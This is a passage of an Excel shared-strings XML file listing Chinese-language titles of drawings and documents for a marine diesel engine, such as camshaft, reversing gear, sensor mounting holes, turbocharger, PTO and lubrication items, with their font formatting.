      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱后侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向连杆锁定</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构调整</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴调整</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向曲柄铣削</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表探头长度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气仪表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>GRAVINER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾探测器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>印刷板布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机电互锁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥控制清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机电子零件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制板图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>互锁机电图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警面板图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示仪表图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱布置图</t>
    </r>
  </si>
  <si>
    <r>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器列表</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试设备布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位移传感器拧紧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器安装孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油系统电路图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油传感器安装孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸磨损传感器孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>VMON</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统电路图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环传感器孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器套筒盖孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>降功率柴油机适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节器增压机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵组</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>题板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速管安装图表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车图表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明，发动机控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向系统供气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰盘轴承装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>MS45</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃料指数曲线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀调节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间帽</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/RCF.TCS/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机准备</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油补充</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子布置原理图</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/GCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子连接</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率输出轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机末端</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀和示功阀安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器调整</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工描述</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振板导向</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔音，规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>P131</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气噪音</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气管吹气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器钻孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮负荷表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气图表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复合冷却器列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器防护装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设定</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量转换器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气总管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排放</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>噪音要求</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风电动机马达</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后空冷器体焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
